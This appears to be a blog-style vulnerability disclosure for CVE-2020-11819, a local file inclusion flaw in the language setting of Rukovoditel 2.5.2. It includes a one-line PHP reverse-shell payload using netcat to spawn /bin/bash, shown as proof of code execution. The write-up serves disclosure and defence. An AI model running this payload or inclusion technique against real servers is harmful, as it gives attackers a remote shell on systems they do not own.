Vendor: https://sourceforge.net/projects/rukovoditel/
Version: 2.5.2
Vulnerability: LFI
CVE: CVE-2020-11819
CVSS 3.x Base Score: 9.8 CRITICAL
Rukovoditel is a free web-based open-source project management application. A far cry from traditional applications, Rukovoditel gives users a broader and extensive approach to project management. Its customization options allow users to create additional entities, modify and specify the relationship between them, and generate the necessary reports. The platform enables users to craft their own application that is specifically tailored for their activity (CRM, ERP, HRM, WMS, etc.).
I was trying to change language of the application and at the same time looking at the burp. I selected Russian as a language then I realized, russian.php file name is in the body of the request.
Here is my theory, application runs russian.php file in the directory and if I put the exact php reverse shell path into the body of the request, I should gain access to the machine. Let’s try this theory, I write this one liner php code.
1
<?php system("nc 127.0.0.1 1234 -e /bin/bash"); ?>
Then, I put this code into test.php file in the root directory of the machine. Finally, I give the exact path of the test.php file and boom! test.php file is executed and I gain access.
I know, this may not be a real attack scenario but I wanted to show attacker can run arbitrary php file on the server and this may be lead to unexpected results.